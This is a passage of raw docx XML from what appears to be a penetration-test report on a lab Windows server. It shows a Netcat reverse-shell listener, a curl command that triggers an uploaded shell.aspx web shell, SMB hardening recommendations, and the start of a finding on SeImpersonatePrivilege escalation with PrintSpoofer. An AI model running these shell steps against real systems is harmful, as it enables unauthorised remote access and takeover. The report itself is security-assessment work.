          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#smb: \&gt; exit terminates the SMB session cleanly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09F637">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A699FEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429FF095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1600835"/>
            <wp:effectExtent l="0" t="0" r="698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9865" cy="1600835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210AF29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF0A464">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As a penetration tester, you take the position of an attacker and your machine is the attacker’s machine. To get the machine’s IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA56CB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD964CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6897E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AA852D"/>
    <w:p w14:paraId="72567AD6">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="889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7960" cy="2923540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3839D924"/>
    <w:p w14:paraId="726326A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Set up the Netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74D0BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E012C7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F80B64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-143510</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>122555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5619750" cy="1304925"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="38" name="Rectangle 38"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="999490" y="4651375"/>
                          <a:ext cx="5619750" cy="130492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pt;margin-top:9.65pt;height:102.75pt;width:442.5pt;z-index:251662336;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAubxNONkAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBCFdyT+g3VIbK1dk0ZpGqdDEAMCCVFY2Nz4SALx&#10;OYqdpPx7zETH0/v03nfF4Wx7NuPoO0cKNmsBDKl2pqNGwfvbwyoD5oMmo3tHqOAHPRzK66tC58Yt&#10;9IrzMTQslpDPtYI2hCHn3NctWu3XbkCK2acbrQ7xHBtuRr3EcttzKUTKre4oLrR6wKrF+vs4WQUf&#10;2y/+0lWLnp4f75+28+hElTilbm82Yg8s4Dn8w/CnH9WhjE4nN5HxrFewkjKNaAx2d8AikKUyAXZS&#10;IGWSAS8LfvlC+QtQSwMEFAAAAAgAh07iQJaBn8prAgAA3AQAAA4AAABkcnMvZTJvRG9jLnhtbK1U&#10;TW/bMAy9D9h/EHRfnaRJUwd1iqBBhwHFVqwbdlZk2Ragr0lKnO7X70l226zboYfloJAi/Ug+krq6&#10;PmpFDsIHaU1Fp2cTSoThtpamrej3b7cfLikJkZmaKWtERR9FoNfr9++uercSM9tZVQtPAGLCqncV&#10;7WJ0q6IIvBOahTPrhIGxsV6zCNW3Re1ZD3StitlkclH01tfOWy5CwO12MNIR0b8F0DaN5GJr+V4L&#10;EwdULxSLKCl00gW6ztk2jeDxS9MEEYmqKCqN+UQQyLt0Fusrtmo9c53kYwrsLSm8qkkzaRD0GWrL&#10;IiN7L/+C0pJ7G2wTz7jVxVBIZgRVTCevuHnomBO5FlAd3DPp4f/B8s+He09kXdFz9N0wjY5/BWvM&#10;tEoQ3IGg3oUV/B7cvR+1ADFVe2y8Tv+ogxwrWpblvASzjxWdXyym58vFwK84RsJhX1xMy+UCDhwe&#10;0/PJvJxlj+IFyfkQPwqrSRIq6pFK5pUd7kJEdLg+uaTAxt5KpXITlSE9UGfLSQrAMJkNJgKidqgu&#10;mJYSplqMPI8+QwarZJ0+T0DBt7sb5cmBpUHJv5Q7wv3hlmJvWegGv2waStQyYiuU1BW9PP1aGYAk&#10;AgfKkrSz9SM493YYxuD4rQTsHQvxnnlMH/LHfsYvOBplUZQdJUo663/96z75YyhgpaTHNKPgn3vm&#10;BSXqk8G4lNP5HLAxK/PFcgbFn1p2pxaz1zcWPEzxEjiexeQf1ZPYeKt/YI03KSpMzHDEHqgdlZs4&#10;bBkeAi42m+yGkXcs3pkHxxP40MDNPtpG5t6+sDOShqHPPRgXNG3VqZ69Xh6l9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5vE042QAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54&#10;bWxQSwECFAAUAAAACACHTuJAloGfymsCAADcBAAADgAAAAAAAAABACAAAAAoAQAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwUGAAAAAAYABgBZAQAABQYAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF017F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#nc is the short form of netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB962C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-l instructs netcat to listen for incoming connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15159BC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">#-v enables verbose mode where a detailed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>feedback immediately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the remote target connection is established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA15E4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-n restricts output to numeric only to avoid DNS mapping IP addresses to domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E06B44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-p specifies the port number of the port to be opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB70DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4667D964">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="635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0500" cy="1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDD8EBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC26B91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It is verbose that allows the immediate display of the output “listening on [any] 4444 without the -v the command would remain silent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130768C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18725B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E8BA4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B7D9CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF56783">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0A9138">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78FD6EC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4883E766">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Trigger the payload that will be captured by the Netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8F6FB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>curl http://10.49.167.173:49663/nt4wrksv/shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242C0D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4867275" cy="914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867275" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B663E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A2F13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Or paste the URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.49.167.173:49663/nt4wrksv/shell.aspx" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://10.49.167.173:49663/nt4wrksv/shell.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly on your browser and let it load. On completion there will be output in the Netcat listener terminal showing your successful connection to the reverse shell as shown in the image above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9F8E6">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Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3602E594">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Disable anonymous access to all SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0D6A57">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Implement proper authentication for SMB access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D083F">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Remove write permissions from IIS-accessible directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8BFE2">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Apply principle of least privilege for share permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2CE6E">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Regularly audit SMB shares for misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB86F2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Finding 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0EDB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Title: SeImpersonatePrivilege Misconfiguration Enabling SYSTEM Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1B92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Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B251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Description: The Windows server was configured with the SeImpersonatePrivilege enabled for the iis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppPool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">\default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppPool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> user. This privilege allows a process to impersonate a client token, which can be exploited to impersonate a SYSTEM-level token and execute arbitrary commands with the highest privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584DD90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Impact: An attacker with low-level privilege can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913009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~Use PrintSpoofer to impersonate SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7AAC2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~Execute arbitrary commands with SYSTEM privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FCA5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~Access sensitive system files, including Administrator's Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9631F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~Compromise the entire host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678A614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Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BC889">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Know the privileges information from the default user server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66AE22">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
